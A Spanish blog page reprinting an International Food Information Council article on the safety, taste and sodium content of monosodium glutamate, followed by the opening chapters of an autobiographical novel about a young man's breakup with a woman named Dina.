Los experimentos de escala multidimensional, que se utilizan en las investigaciones sensoriales, indican que el sabor del glutamato monosódico no puede clasificarse ni como dulce, ácido, salado o amargo. Este sabor distintivo se conoce con el nombre de “umami”, palabra acuñada por los japoneses para describir el sabor impartido por el glutamato. A menudo, los occidentales describen este sabor
como sabroso, similar al caldo o carne.
Hace poco tiempo, el Dr. Chaudhari y sus colegas de la Facultad de Medicina de la Universidad de Miami identificaron un receptor específico del sabor del glutamato en la lengua.
Las investigaciones dietéticas resaltan el potencial que tiene el glutamato monosódico para aumentar el consumo de alimentos en los
ancianos. A través de los años, las investigaciones han demostrado que la pérdida de los sentidos del gusto y del olfato es un elemento que contribuye al pobre estado nutricional de los ancianos que, en algunos casos, conduce directamente a la anorexia.
La pérdida de los sentidos del gusto y del olfato se produce aproximadamente a los 60 años, aunque es más común en personas de más
de 70 años de edad. Hay estudios que prueban que agregar niveles moderados de glutamato monosódico a algunos alimentos, como por
ejemplo, la sopa de champiñones y el puré de papas, puede aumentar el consumo de alimentos en una población mayor institucionalizada,
y de paso aumentar el consumo de las vitaminas, minerales y proteínas necesarios de los alimentos.
Consumo y Metabolismo del Glutamato Monosódico
Los datos actuales del Reino Unido muestran que el consumo per cápita de glutamato monosódico es de 4 gramos (menos que una cuchara de téGuiño por semana. Esto puede compararse con las estimaciones de los Estados Unidos que son de aprox. 0,55 gramos para el
consumidor promedio, durante todo el día. En Taiwán, por ejemplo, las cifras del consumo per cápita son mucho más elevadas, llegando casi a un promedio de 3 gramos por día. Aún así, el cuerpo humano metaboliza el glutamato agregado de la misma manera en que metaboliza el glutamato que se encuentra naturalmente en muchos alimentos. Una vez que se ingiere el glutamato, nuestros cuerpos ya no hacen distinciones entre los orígenes del mismo. El cuerpo no distingue entre el glutamato del tomate o el glutamato monosódico agregado a la salsa de tomate. De hecho, las investigaciones actuales muestran que el glutamato de los alimentos o el glutamato monosódico es importante para el funcionamiento normal del tracto digestivo y la digestión.
El Glutamato Monosódico y la Salud Pública
En 1958, la Administración de Alimentos y Fármacos (FDA) designó al glutamato monosódico como un ingrediente GRAS (reconocido generalmente como seguro), junto con muchos otros ingredientes comunes como la sal, el vinagre y el polvo de hornear. Existe un consenso generalizado en la comunidad científica, que se basa sobre numerosos estudios bioquímicos, toxicológicos y médicos que se fueron realizando durante cuatro décadas, que indica que el glutamato monosódico es seguro para la población en general, para las embarazadas y mujeres en período de amamantamiento, y para los niños. En 1995, se reforzó nuevamente la seguridad del glutamato monosódico para su uso de parte de la población estadounidense en una revisión de la Federation of American Societies for Experimental
Biology (FASEB). Esta revisión se llevó a cabo a solicitud de la FDA, tal como se hace periódicamente con todos los ingredientes GRAS.
El Glutamato Monosódico y Las Etiquetas de los Alimentos
La FDA exige la inclusión en la etiqueta de un listado de todos los ingredientes de los alimentos procesados y empacados. Cuando se agrega glutamato monosódico a un alimento, se lo debe incluir en la lista de ingredientes. Cuando se usan ingredientes que contengan glutamato monosódico como componentes, también se debe indicar incluyendo en el listado su nombre común o usual (por ejemplo,
queso parmesano, tomates, salsa de soja, proteína hidrolizada o extracto de levadura autolizada).
El Glutamato Monosódico y la Reducción del Sodio
Contrariamente a la creencia popular, el glutamato monosódico no tiene un alto contenido de sodio. El glutamato monosódico contiene
sólo un tercio de la cantidad de sodio presente en la sal de mesa, el cloruro de sodio (12% contra 39%). Cuando se usan cantidades pequeñas de glutamato monosódico combinadas con cantidades reducidas de sal de mesa en la preparación de comidas, las propiedades de realce del sabor del glutamato monosódico permiten que se utilice menos sal durante y después de cocinarla.
El glutamato monosódico realza los mejores sabores naturales en los alimentos, funciona de maravillas en platos con contenido reducido de sodio y grasas, y puede reducir el sodio total de 30 a 40% sin influir sobre el sabor. Mujeres Embarazadas y en Período de Amamantamiento Es común que las mujeres embarazadas consuman una dieta variada bien equilibrada y suficientes calorías para
garantizar un embarazo saludable. Para facilitar el crecimiento y desarrollo fetales, la mayoría de los aminoácidos son transportados activamente a través de la placenta. Las investigaciones indican que las concentraciones de aminoácidos son más elevadas en
el feto, sin que importe lo que esté consumiendo la madre. Tanto la placenta como el hígado del feto tienen funciones importantes en el transporte y metabolismo de los aminoácidos (y específicamente el glutamato) que es importante para el desarrollo fetal.
Debido a que es difícil aumentar el glutamato de la sangre hasta niveles muy elevados por medio del consumo dietético de glutamato monosódico, los científicos han inyectado glutamato directamente en el torrente sanguíneo para observar los efectos.
Pitkin y colegas administraron grandes cantidades intravenosas de glutamato monosódico a monas embarazadas para aumentar los niveles de glutamato en el torrente sanguíneo de la madre. Cuando se les examinó, no se observó ningún aumento en los niveles de glutamato en el feto con dosis de hasta 220 mg/kg de peso de la madre. Los autores llegaron a la conclusión de que la placenta es virtualmente impermeable al glutamato, incluso en niveles elevados. Las investigaciones sugieren que hay una pérdida neta típica de glutamato que va desde la sangre del feto hasta la placenta. En estudios con roedores, los investigadores analizaron los efectos del consumo dietético de glutamato monosódico en la reproducción y el nacimiento. El estudio analizó a tres generaciones de ratas que fueron alimentadas con una ración diaria de hasta 7,2 g/kg de glutamato monosódico. No se observaron efectos adversos en cada generación, ni tampoco ninguna evidencia de lesiones cerebrales en los neonatos. Además de investigar al feto, los científicos también investigaron el efecto del consumo de glutamato monosódico en la lactancia y en los bebés alimentados con leche materna. Cuando se examinó a mujeres en período de amamantamiento que consumieron 100 mg/kg de peso corporal de glutamato monosódico, los investigadores no advirtieron ningún
aumento en el nivel de glutamato en la leche humana, y tampoco ningún efecto en el consumo de glutamato del bebé.
De la misma manera, los estudios demuestran que los bebés alimentados con leche materna pueden detectar y preferir el sabor del glutamato que ocurre naturalmente, que es 10 veces más pleno en la leche materna que en la leche de vaca. Según Baker y colegas, un bebé recién nacido, ingiere más glutamato libre por kilogramo de peso corporal mientras está siendo amamantado que durante cualquier
otro período de su vida. Además, en diciembre de 1993, el Comité sobre Drogas de la Academia de Pediatría de los Estados Unidos revisó los efectos que tienen los alimentos y los agentes ambientales en el amamantamiento.
En el informe, el Comité indicó que el glutamato monosódico no tiene efecto en la lactancia y no representa ningún riesgo para el bebé consumidor.
Fuente:
International Food Information Council
Foundation
USA, 2001

Publicado por Autor @ 3:51 | Lorem ipsum | 0 Comentarios


Publicado por jacintoluque @ 18:55
Comentarios (0)  | Enviar
S?bado, 16 de enero de 2010

Autor:

 

Mario Alonso Madrigal

 

Introducción

 

Extrañando a Dina es un libro basado en una historia real. Específicamente, inspirado en una relación de pareja que tuve con una joven llamada Dina. Pero no es precisamente la historia de ambos, sino la mía después de haber terminado con ella. Aunque sí hago ciertas referencias a lo que vivimos, es más una descripción de lo que sentí, al separarnos.

 

Cuando nuestra relación acabó, yo sufrí de forma muy intensa, lo cual dio lugar a que tuviera largos ratos de meditación acerca de la soledad, el miedo, la tristeza, el dolor, la sexualidad, el placer, el amor -no sólo de pareja sino en general-, y otras cosas. Estas páginas contienen lo que aprendí acerca de ello durante ese tiempo.

 

Mi intención al crear esta novela no es sólo proporcionar entretenimiento, también es hacer un aporte a las demás personas. Como en cierto momento pensé que tal vez a alguien, le podría ayudar en algo el leer mis reflexiones, decidí compartirlas de manera escrita.

 

Con eso no quiero decir que este libro sea una obra mágica e incuestionable, portadora de verdades a seguir para poder alcanzar la felicidad, ni nada por el estilo. Lo narrado aquí es mi verdad, en la cual creo, pero no tiene por qué ser la verdad de otros. Si de alguna manera mis relatos le ayudan al lector, pues me alegro mucho. Pero si no es así, ni modo, no escribí con el afán de convencer a nadie, lo hice simplemente para compartir.

 

Me encantaría que quien lea mi experiencia, al hacerlo trate de sentirse no sólo espectador, sino también protagonista. Con esto, me refiero al hecho de leer procurando sentir todo lo vivido por mí, en este recorrido de soledad; el dolor, la angustia, el miedo, la frustración, la duda, el desesperado afán de encontrar respuestas, la esperanza de volver con Dina, y cualquier otra emoción o sentimiento que se presente.

 

A mi parecer, si el libro se lee de esa manera, tal vez se pueda entender mejor lo que sentí y quizás las palabras no me resultaron suficientes para explicar.

 

 

 

 

 

 

 

 

 

 

 

 

Capítulo 1

Cuando Dina y yo terminamos llevábamos pocos meses de ser novios, pero a diferencia de otros noviazgos nuestra relación fue muy intensa, o por lo menos así lo sentí yo. Éramos compañeros en la universidad, nos veíamos casi a diario durante bastante rato, en muchas ocasiones ella dormía en mi casa, y a veces yo, en el apartamento de ella.

 

Dina había dejado su trabajo debido a que el horario no le permitía asistir a la universidad. Esperaba pronto hallar otro, con una jornada más conveniente para ella. Los días fueron pasando y no encontraba empleo, lo cual la hacía sentirse muy agobiada. Mientras tanto se sostenía con lo poco que ganaba los fines de semana; los sábados en una labor de medio tiempo que un amigo mío le había conseguido, y los domingos colaborando en una tienda de ropa con su hermano. Yo le ayudaba con la alimentación.

 

En esa situación -muy angustiante para ella-, pasó un tiempo, hasta que llegó un momento en el cual estaba completamente desesperada por su falta de empleo. Debía pagar el alquiler del apartamento donde vivía y como no tenía dinero, comenzamos a pensar en la posibilidad de que residiera conmigo mientras encontraba una labor de tiempo completo.

 

En ocasiones anteriores habíamos conversado sobre el hecho de irnos a vivir a una misma casa, pero yo no lo tomaba en serio porque no sentía estar preparado para dar ese paso. En algún momento me dijo que si yo realmente la quería, debía tomar en cuenta la mala situación económica en la cual se encontraba y llevármela a vivir conmigo. Aunque yo consideraba esas palabras como una especie de chantaje sentimental, sólo le respondía que para mí, unión libre es igual a matrimonio, lo cual no me parecía apropiado, que mejor dejara eso como última opción y esperara a ver si pronto conseguía empleo.

 

Yo no tomé esa actitud por egoísmo, sino porque consideraba necesario esperar más tiempo antes de adquirir un compromiso tan serio para mí, como juntarnos.

 

Ella me decía que prácticamente vivíamos juntos, porque todos los días nos veíamos y dormíamos en la misma cama. Yo le decía que para mí sí había algunas diferencias significativas en comparación con una pareja que habita bajo el mismo techo, por ejemplo; ella aún no poseía llave de mi casa, seguía teniendo la mayoría de sus cosas en su apartamento, pasábamos uno que otro día sin vernos, yo me sentía inseguro y además, mi hermano vivía conmigo, por lo cual, no podíamos disponer solamente nosotros dos, la opinión de él también contaba. Pero como se aproximaba el momento de pagar el alquiler y ella no tenía dinero, era necesario tomar una decisión.

 

_Yo no puedo seguir pagando el alquiler -me dijo un día-, primero, por la falta de plata, y segundo, porque ya casi no utilizo mi apartamento para nada; diariamente me quedo a dormir donde tú vives y tengo mucha ropa ahí. Mejor me llevo a tu casa la ropa que aún tengo en mi apartamento, y me quedo contigo mientras encuentro algún empleo.

 

Accedí a la idea con un poco de nerviosismo y le dije que dejara sus muebles en casa de su madrastra.

 

Dina también tenía oportunidad de irse a vivir con ella, pero no lo hacía debido a ciertos problemas que tuvieron algún tiempo atrás. Esa señora la había agredido mucho, tanto física como verbal y emocionalmente, desde niña y durante toda su adolescencia. Dina decía seguir hablándole debido a que le ayudaba con dinero y porque allí vivían sus dos hermanos menores, a quienes quería mucho. Pero una de sus metas era ser solvente económicamente y esperar a que sus hermanos vivieran en otro lado para no volver a dirigirle la palabra nunca.

 

Comentaba que aunque su madrastra se comportara gentil en ese momento, ofreciéndole un cuarto, era pura hipocresía. Que actuaba así solo porque no vivían en la misma casa, y si así fuera, nuevamente volvería a comportarse de forma violenta, y comenzarían los problemas otra vez.

 

Mientras nos poníamos de acuerdo respecto a lo que íbamos a hacer le dije:

 

_Escúchame, quiero dejar algo claro; tú y yo no nos estamos casando ni decidiéndonos a vivir en unión libre, que no es lo mismo pero es igual. Por eso te pedí que dejaras tus muebles en otro lado, porque de lo contrario sería igual que juntarnos. Si traes todo para acá, cuando encuentres trabajo no te vas a ir ni yo voy a dejarte marchar; porque ya estaremos acostumbrados a vivir juntos y no vamos a querer separarnos. Y no me parece correcto el aferrarnos tanto, uno al otro, de forma tan rápida.

 

A juzgar por su expresión, pude notar que ese comentario le molestó, pero no respondió nada hasta el día siguiente por la noche. Veníamos saliendo de clases, cuando me dijo:

 

_Estuve pensando en lo que me dijiste ayer y he cambiado de parecer, mejor no voy a vivir contigo, pero para sentir que vale la pena el dinero pagado por el alquiler de mi apartamento, pasaré más tiempo ahí, de hoy en adelante dormiré en tu casa sólo los fines de semana. Antes de venirme a la universidad le vendí la refrigeradora a mi madrastra, con ese dinero pagaré el alquiler durante los próximos dos meses, tal vez en ese tiempo consiga trabajo.

 

_ ¿Pero por qué así? -respondí-, ¿no te parece que estás reduciendo demasiado nuestro tiempo?, además, sí estás utilizando tu apartamento, ahí tienes muchas cosas y el dormir en mi casa no implica el dejar de ir a tu apartamento cuando quieras, como a menudo lo haces.

 

A mí me parecía que ella buscaba mediante esa actitud, terminar parcialmente con nuestra relación, pero por más que intenté hacerla cambiar de parecer respecto a esa decisión de vernos menos, siguió firme en su determinación.

 

_Por más que insistas no cambiaré de opinión -me decía-, y si tanto te molesta eso, entonces terminemos de una vez por todas.

_ ¡Ah!, así que ahí querías llegar -le dije-, estás buscando un pretexto para pelear y terminar la relación, sólo porque no accedí a que nos juntáramos.

 

Le dije eso no sólo por la evidente molestia expresada en su rostro cuando el día anterior le dije que no deseaba juntarme, sino también porque desde unas semanas atrás me había parecido que ella, -a pesar de haber pensado varias veces, en vivir conmigo-, se sentía muy insegura con nuestra relación y quería alejarse de mí. Sin embargo, después tenía cambios emocionales drásticos y decía adorarme e incluso querer casarse, entonces concluí que su intención era “todo o nada”; o estamos juntos completamente, o no estamos juntos. Yo pensaba que sí me quería pero su necesidad económica la estaba confundiendo.

 

Ese día estuvimos discutiendo por lo mismo durante mucho rato hasta llegar a mi casa, donde hubo un absoluto silencio. Yo solamente esperaba a que ella me dijera algo así como: “Voy a pasar menos tiempo aquí, pero cuando quieras puedes llegar a mi apartamento”.

 

En ningún momento lo dijo, lo cual para mí, reafirmaba mi sospecha de que ella no quería continuar con nuestra relación, por lo menos no bajo las condiciones en las cuales estábamos. Cuando ya no aguanté más el silencio, le dije:

 

_Lo más doloroso para mí, es no haberte oído decir que entre semana yo puedo quedarme en tu apartamento de vez en cuando.

_No te lo he dicho porque es lógico -dijo-, puedes llegar cuando quieras.

 

Como respondió con un tono bastante apagado, no creí que lo dijera sinceramente, sin embargo, no quise continuar con la conversación.

 

Esa noche no hubo entre nosotros ni un solo beso o abrazo, situación que era inusual. Al acostarnos intenté acariciarla con el fin de reconciliarnos, pero al notar su seriedad me detuve.

 

Al día siguiente yo no tenía trabajo porque era sábado, pero ella sí. Se levantó muy temprano y mientras me encontraba dormido, empezó a empacar sus cosas. El ruido que estaba haciendo me despertó, al verla guardando todo pensé:

 

Sí, definitivamente este es el final, esperaré a que me diga algo.

 

No me dijo nada, solamente terminó de alistar su ropa. Cuando estaba a punto de salir le pregunté:

 

_Dina, ¿qué vamos a hacer ahora?

 

Con esa pregunta, me refería a cuáles eran nuestros planes para después de que ella terminara de trabajar.

 

_Apenas salga del trabajo vengo a recoger mis cosas y me voy a mi apartamento -dijo-.

_Pero estabas a punto de irte sin decirme nada, ¿cómo iba yo a saber a qué hora  vas a venir?

 

Le hice esa pregunta porque yo no tenía un teléfono en el cual recibir llamadas. Se quedó un momento en silencio y dijo:

 

_Bueno, chao.

 

Yo asumí, aunque no me lo dijera, que estaba cortando conmigo. Esto lo creí debido a varias razones:

 

Primera, era sábado; según me había dicho el día anterior, los fines de semana pasaríamos juntos, sin embargo, sus planes eran irse a su apartamento después del trabajo. Segunda, se marchaba sin decirme nada; eso nunca lo hacía. Tercera, había empacado absolutamente todo lo que tenía en mi casa. Y última, al preguntarle qué íbamos a hacer, respondió que después de trabajar se llevaría todo. Para mí era muy claro; estaba acabando con la relación.

 

Me levanté de la cama y fui a desayunar. Un rato después de haber acabado, pensé:

 

Bueno, tal vez sea mejor así. De todos modos ella no sabe ni qué quiere realmente, ciertos días se muestra felicísima y dice amarme con toda su alma, y a veces está tan irritable que no puedo ni acercármele. En algunas ocasiones afirma nunca haber imaginado encontrar a alguien tan especial como yo, y en otras manifiesta sentirse insegura con nuestra relación, al punto de no saber si lo mejor es terminar conmigo.

 

Y yo por mi parte, ya me estoy cansando de algunas cosas, como de que me cele tanto. Eso me hace sentir muy limitado.

 

Además, creo estar muy joven como para aferrarme tanto a una relación de pareja.

 

Habiendo concluido que lo mejor era terminar, decidí arreglar de forma inmediata, un asunto pendiente entre nosotros; fui al teléfono público, la llamé a donde estaba trabajando y le dije:

 

_Por favor, cuando vengas ahora en la tarde tráeme la plata que te presté.

_Con mucho gusto -respondió-.

 

Yo le había prestado dinero para el alquiler del mes pasado, y como acababa de venderle la refrigeradora a su madrastra, consideré ese momento como el adecuado para pedírselo, ya que no sabía cuándo la volvería a ver, no sólo por el hecho de terminar, sino también porque eran los primeros días de diciembre y estaba a punto de concluir el período lectivo, por lo cual, tampoco la vería en la universidad.

 

Esa última conversación la tuvimos aproximadamente a las diez de la mañana. A pesar de que ella salía hasta las cuatro de la tarde, media hora después de haberla llamado, estaba en mi casa. Llegó en un taxi y entró a recoger sus cosas.

 

_ ¿Qué pasó con el trabajo? -le pregunté-.

_Pedí un rato libre para venir a recoger todo -me dijo-, el lunes en la universidad le doy su dinero.

 

Sacó todas las bolsas de la alcoba, recogió una ropa que tenía colgada en el tendedero del patio y se fue.

 

_Te voy a extrañar -le dije cuando estaba saliendo-.

_Chao -respondió-.

 

 

 

 

Capítulo 2

Estuve todo el día, con mucho dolor, pensando en lo que había pasado. Cuando ya era de noche, mientras estaba cenando, empecé a extrañarla muchísimo y a sentirme muy arrepentido por no haber intentado solucionar nuestros problemas. Entonces me puse a pensar:

 

¿Por qué terminamos? Aunque en el momento lo creí oportuno, ahora, pensándolo mejor, me parece que no hay un buen motivo como para acabar con la relación. Además, nos amamos, y cuando hay cariño no se deja ir todo así nada más. Si sigue existiendo amor y no ha habido irrespeto, deberíamos continuar.

 

Terminé de cenar, me lavé los dientes, salí, abordé un taxi y me fui a su apartamento con el fin de platicarle sobre eso que había pensado. Tal vez si hablábamos más claramente podríamos entendernos mejor, pensaba yo.

 

Dina era divorciada, me había contado que su esposo la agredía de muchas formas, desde cosas tan simples como obligarla a utilizar el "speaker" cuando hablaba por teléfono, para él poder escuchar, hasta cosas tan degradantes como patearla mientras la trataba de zorra, o prohibirle cerrar la puerta del baño cuando hacía sus necesidades, para asegurarse de que no le ocultaba nada.

 

De hecho, me había comentado que no lo quería lo suficiente cuando se casaron, pero lo hizo principalmente porque deseaba dejar de vivir con su madrastra e irse a otro lado, pero no tenía recursos económicos para hacerlo sola.

 

Mientras iba en el taxi pensaba:

 

Dina estuvo casada, debe saber que todas las parejas tienen problemas, y después de haber vivido con ese patán, difícilmente querrá tirar a la basura una relación tan linda como la nuestra, sin hacer un último esfuerzo. Hablaré con ella, haré todo lo posible por entenderla y le pediré que lo intentemos de nuevo. 

 

Llegué a su apartamento y no estaba, o si estaba no me quiso abrir. Llamé a casa de su abuela y no se encontraba ahí. Entonces llamé a su madrastra.

 

_Aquí no está -me dijo con una voz fría y cortante-, pero vendrá mañana como a las 8:00 a.m., si quiere llámela a esa hora.

 

Por su tono de voz supuse que ya se había enterado de nuestra ruptura.

 

Me devolví a casa sintiendo una inmensa necesidad de tenerla a mi lado y preguntándome por qué había sido tan idiota de dejarla partir así nada más, sin hacer mayores esfuerzos por llegar a un acuerdo. En la madrugada quería levantarme, tomar un taxi e ir nuevamente a su apartamento a buscarla, pero logré controlarme y pude dormir.

 

Al día siguiente, estaba a las ocho en punto de la mañana llamando por teléfono:

 

_Mario Alonso, Dina aún no ha venido -me respondió su madrastra-, pero definitivamente no quiere continuar con la relación. Está muy molesta porque usted, conociendo la difícil situación económica por la cual está pasando, le pidió la plata de un pronto a otro.

_Se la pedí porque simplemente se iba a ir sin decirme absolutamente nada -le dije-, y como le había vendido la refrigeradora a usted, entonces aproveché que tenía suficiente dinero como para pagarme y cancelar su alquiler. Pero de todos modos, yo no quisiera terminar con ella, porque la quiero y no me parece que haya sucedido nada tan grave como para acabar con nuestro noviazgo, además...

_Pero usted, por ser hombre, no debió haberle pedido el dinero ni aunque terminaran, porque el varón siempre se debe encargar de la mujer, y la plata que le da debe darla por perdida.

 

Yo sabía que esa señora era una persona muy machista a la cual resultaría imposible explicarle que a mi parecer, el noviazgo entre Dina y yo no era una de esas relaciones hechas a la antigua donde el hombre está obligado a mantener a la mujer. Que para mí, las mujeres tienen las mismas obligaciones del varón; si yo le hubiera pedido dinero prestado a Dina, lo normal es pagárselo después, por lo cual ella debería actuar de la misma manera. Que Dina muchas veces se había catalogado a sí misma como una persona muy liberal en todo sentido, incluyendo el económico, y que yo también estaba necesitando ese dinero, el cual no había podido usar por ayudarla. Sin embargo, preferí no decirle nada para no entrar en una discusión.

 

_Un momento, ya viene Dina -me dijo-, voy a decirle que usted desea hablar con ella.

_ ¿Sí? -contestó Dina en un tono bastante seco-.

_Hola -respondí-, ayer te fui a buscar en la noche.

_Sí, me contó mi vecina que te vio.

_Necesitaba hablar contigo.

_Pero yo no quiero hablar con usted, he visto que no es quien yo creí, con esa actitud tan maldosa de pedirme el dinero conociendo mi situación económica.

_Yo no lo hice para molestarte o hacerte sentir mal.

 

Le expliqué por qué había sido, pero ella no aceptaba mis razones.

 

_Olvídelo Mario Alonso -me decía-, yo ya tengo mi vida resuelta, no hay nada más por hablar, y no crea que me va a convencer, porque cuando yo tomo una decisión soy firme en ella.

_Bueno, si no quieres volver conmigo está bien -le respondí-, pero quisiera conversar contigo.

_No, yo no quiero hablar con usted.

_Mira, te pido disculpas si ese asunto del dinero te lastimó, no fue mi intención hacerte sentir mal. Quiero hacerte saber que te amo y quisiera charlar para intentar llegar a un acuerdo, me gustaría decirte varias cosas que he pensado.

_Pero yo no quiero discutir nada más, entiéndalo y sepa que todo terminó.

_ Si a tu ex-marido le aguantaste tantas groserías, y a tu madrastra le sigues hablando después de como te ha tratado, ¿por qué eres tan inflexible conmigo?

_No le voy a dar explicaciones acerca de eso, adiós.

 

Cuando colgó el teléfono me sentí destrozado, sabía que hablaba en serio, entonces me dije a mí mismo:

 

Si te interesa no te debes rendir así nada mas, debes luchar hasta donde puedas.

 

Llamé a su madrastra en la noche y le estuve hablando varias cosas, entre tantas, que yo amaba a Dina y no la quería solamente como novia sino como mi futura esposa, que ella y yo habíamos hablado del hecho de vivir juntos y tener o adoptar niños, pero a mí me parecía preferible terminar nuestras carreras antes de intentarlo.

 

Le dije que nunca le había hablado sobre esto, de manera tan clara a Dina, por lo cual quería decírselo, hacerle saber que si quería una relación más formal, por mi parte sí la podíamos tener, pero teniendo paciencia.

 

También le mencioné que deseaba preguntarle a Dina por qué no me quería dar, ni siquiera la oportunidad de hablarle.

 

Me recomendó llamar dentro de unos días, cuando a Dina se le bajara un poco el enojo, pero me advirtió que ella había dicho no querer volver a hablar conmigo nunca.

 

Al ver la decisión de Dina me decidí a hacerlo lo mejor posible, escribí una carta para dársela en la noche del siguiente día (lunes), cuando la viera en la universidad, en la cual le manifestaba no sólo mis sentimientos hacia ella, sino también lo que a mi parecer, podríamos llegar a hacer en un futuro.

 

Al día siguiente llegué a la universidad justo cuando estaba empezando la clase, por lo cual me vi obligado a esperar hasta la salida para poder hablarle. Cuando terminó la lección me acerqué a donde ella estaba e inmediatamente me dio el dinero. Intenté dialogar y no quiso hacerlo. Le expliqué muy rápidamente mi opinión respecto a lo acontecido y le pedí disculpas, pero ella solamente me evitaba y decía que todo había acabado. Por último, le di la carta y le pedí por favor llamarme si cambiaba de opinión, ella asintió con la cabeza y se marchó.

 

Esa noche me fui muy apesadumbrado para mi casa, me sentía embargado por una profunda sensación de impotencia.

 

Al día siguiente, mi amiga y compañera de trabajo, Viky, -quien conocía la situación y yo le había contado lo sucedido la noche anterior-, me sugirió no hacer nada más y esperar la decisión de Dina, pero no le hice caso. Era tal mi desesperación que decidí seguir intentándolo de otras maneras.

 

Ese día entregaban la nota final de una materia que Dina y yo llevábamos juntos, procuré ser el primero en llegar y el último en irse, pensando que tal vez ella me hablaría cuando me viera. Como no había clases y era sólo entrega de nota final, los compañeros únicamente llegaban, recogían su calificación y se iban. Estuve esperando a Dina hasta que el profesor se marchó. No llegó.

 

Tres días después volví a llamar a su madrastra y me dijo que nada había cambiado en la decisión de Dina. Empecé a cuestionarme sobre el porqué de su inflexibilidad:

 

¿Por qué toma esa decisión conmigo y con el sucio de su esposo, sí estuvo durante largo tiempo, y lo perdonó en muchas ocasiones?

 

Según ella nadie la había hecho tan feliz como yo, ya que soy distinto a sus novios anteriores, quienes eran hombres excesivamente machistas, entonces ¿por qué no puede tan siquiera dirigirme la palabra?

 

Como no pude dar respuesta a esas preguntas, dejé de pensar en eso para continuar ideando la manera de hacerla regresar conmigo. Decidí enviarle a casa de su madrastra un ramo de rosas, acompañadas con una nota un poco más larga que la anterior.

 

Esperé un par de días, luego envié las flores, seguí esperando unos cuantos días más, pero no dio ningún resultado.

 

Estaba por rendirme cuando se me ocurrió algo con respecto a la madrastra de Dina:

 

¡A como es de hijueputa esa vieja, tal vez botó las rosas, no le ha dado ni un solo recado, y Dina no sabe que he estado insistiendo!

 

Ante esa duda llamé por teléfono a la abuela de Dina, a quien yo consideraba una persona muy amable y servicial. Le conté brevemente acerca de lo sucedido y le pedí permiso para llegar en la tarde del día siguiente -cuando yo terminara de trabajar-, con una carta dirigida a Dina, en la cual expresaría de forma amplia mis sentimientos hacia ella y mi opinión con respecto a nuestra relación. La señora se comportó muy amable conmigo y me dijo que con gusto recibiría la carta para entregársela a Dina. Al terminar de hablarle me dije:

 

Bueno, haré una carta mucho más extensa que las dos anteriores, con fin de dejarle muy claro mi forma de pensar y sentir. Pero esto debe ser lo último que haga, me he arrastrado demasiado y ya es mucho más que suficiente.

 

Al día siguiente -el último de trabajo antes de salir a vacaciones en la empresa donde yo laboraba-, sonó el teléfono de la oficina mientras me encontraba almorzando y contestó Viky. Llegó ella al comedor y me dijo:

 

_Te llama Dina.

 

Yo corrí hacia el teléfono:

 

_Hola -respondí emocionado-.

_Mario Alonso -dijo-.

_Sí, ¿cómo estás?

_Llamaba para pedirle un favor; deje de molestarme.

_Solamente necesitaba conversar contigo para hacerte saber algunas cosas, pedirte disculpas y aclarar algunas dudas.

_Pero ya me pidió disculpas antes, además, no me interesa hablar nada. Yo tomé una decisión y usted no la ha respetado, así que por favor deje de molestarme y no moleste a mi abuela ¿está bien?

_Está bien.

 

Y colgó.

 

_ ¿Qué te dijo? -preguntó Viky-.

_Que dejara de molestarla, ¿ella le dijo algo a usted?, -le pregunté-.

_No.

 

Me quedé en silencio por un momento.

 

_No se aflija -me dijo Viky-, usted sabía a qué atenerse si seguía insistiendo.

 

Me levanté, saqué de mi salveque una manzana que pensaba dejarle a Dina cuando fuera donde su abuela -ya que le gustaban mucho-, y la dejé en el comedor del trabajo.

 

Fui al baño con la gran carta que la noche anterior había durado varias horas escribiendo, le di una leída, la rompí en pedacitos y la tiré al basurero. Con muchísima tristeza pensé:

 

Muy bien, ya es hora de aceptarlo, todo terminó.

 

 

 

 

 

Capítulo 3

Ese día no pude terminar de almorzar. Simplemente me devolví a la oficina a seguir trabajando y a esperar el fin del último día de trabajo en el año.

 

Al ser la hora de salida, probablemente yo era el único de todo el personal en la institución que no deseaba tener vacaciones, porque como también había terminado el período lectivo en la universidad, estaría mucho tiempo desocupado y sabía que eso me entristecería más.

 

Al llegar a casa mi hermano aún no había llegado. Me senté en el sillón de la sala y comencé a pensar:

 

Nuevamente me encuentro en la soledad que tanto odio. ¿Por qué?, me esforcé tanto con el fin de hacerla regresar y nada. Tal vez luego llegue alguien a mi vida, pero cabe la gran posibilidad de que también se vaya, ¿entonces?

 

Me quedé un rato sentado y en silencio, sin pensar en nada más. La tristeza empezó a hacerse cada vez más intensa, y cuando mis lágrimas estaban a punto salir, me levanté bruscamente y pensé:

 

No puedo quedarme aquí dejando que la soledad me destruya, debo buscar la manera de distraerme.

 

Así que inmediatamente tomé una decisión; pasar esas vacaciones de la forma más alegre posible, con la compañía de algunos amigos. Sin embargo, sucedió algo muy curioso, y fue que durante todos esos días no pude salir con ninguna de mis amistades. Les llamaba y por algún motivo no estaban, o no podían salir cuando yo les proponía.

 

Intenté comunicarme una y otra vez con una amiga llamada Carol y jamás la localicé, posteriormente me di cuenta de que había cambiado su número telefónico.

 

Llamé varias veces a Viky, y siempre me decían que no estaba, nunca pude hablar con ella.

 

Uno de tantos días, acordé con un ex-compañero de universidad, salir a algún lado a tomar algo, convenimos vernos en cierto lugar a las 6:00 p.m., pero no llegó. Me tuve que devolver a la soledad de mi casa.

 

En varias ocasiones estuve telefoneando a Viviana, -otra amiga-, cuando por fin la localicé me dijo que en un rato se iría de vacaciones a un lugar relativamente lejano.

 

También hablé con mi prima y llegamos al acuerdo de que la llamaría cierta tarde, a cierta hora, para salir a algún lado. Cuando intenté comunicarme con ella por teléfono, no estaba.

 

Le propuse varias veces a Susan -una vecina-, que fuésemos a algún lado, pero siempre estaba comprometida.

 

Después de varios días de esa situación, Leo, el hijo del esposo de mi madre, me dijo que llegaría cierta noche a revisar unos fallos en mi computadora. Durante la mañana del día que yo le esperaba estuve pensando:

 

Bueno, ahora más tarde viene Leo y hablamos un rato, aunque no salga a ningún lado, por lo menos no la pasaré aquí tan solo.

 

Al comunicarme con él un rato antes de la hora acordada para vernos, me dijo que no podría llegar. Desesperado y triste me pregunté:

 

¿Qué pasa?, por más intentos que hago siempre me encuentro solo, si no fuera por la ocasión en la cual salí con Roberto, me la hubiera pasado aquí encerrado día y noche.

 

Roberto es mi hermano, y la única vez que habíamos salido juntos durante esas vacaciones, fue mientras él andaba en una reunión con unos amigos y yo me incluí.

 

Luego hubo un par de días en los cuales pude salir, pero fue porque literalmente, me colé. Primero con unos vecinos que ya tenían planeado ir a pasear y fui con ellos. Luego con mi amiga Vanesa, pero también porque ella iba de fiesta con algunos amigos, y yo llegué a donde estaban.

 

